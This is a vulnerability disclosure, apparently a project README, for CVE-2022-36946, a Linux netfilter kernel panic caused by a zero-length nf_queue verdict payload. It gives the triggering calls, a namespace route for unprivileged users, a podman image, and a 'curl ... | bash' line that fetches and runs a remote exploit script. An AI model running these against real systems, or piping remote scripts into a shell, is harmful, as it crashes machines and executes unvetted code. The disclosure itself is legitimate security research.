Reported-by: Domingo Dirutigliano and Nicola Guerrera
While we were working on firegex, our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics.
This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink.
The kernel panics when sending nf_queue verdict with 0-byte nfta_payload attribute.
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num);
nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0);
nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT );
This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook.
So, if user truncates the packet below the header size, this skb_pull() will result in a malformed skb resulting in a panic.
Try it executing curl -sLf https://pwnzer0tt1.it/cve-2022-36946.sh | bash also with an unprivilaged user (more details below).
Using linux namespaces, in particular user namespaces (enabled via kernel.unprivileged_userns_clone=1), a normal user is able
to create a network namespace, enabling them to use the same kernel primitives that trigger the panic.
This will allow you to use the vulnerability without having root.
This scenario is not uncommon: for example podman uses this option to run its (rootless) containers, and on some distros this option is enabled by default.
You can also try to execute the exploit without root privileges executing:
podman run -it --cap-add NET_ADMIN ghcr.io/pwnzer0tt1/cve-2022-36946or if you want to test it on-fly (only tar and curl are required to be installed):
curl -sLf https://pwnzer0tt1.it/cve-2022-36946.sh | bashFixed in linux kernel 5.19 view diff
Original patch by the linux kernel security team here
- A vulnerable linux kernel
- CAP_NET_ADMIN capability (also in a namespace)
It worked at the 6th attempt, so we kept the name.
https://docs.google.com/presentation/d/1SoSFxpfQ02_ZkLKFMxpkgst3F56sBiQN3FfNfTutxUs/edit?usp=sharing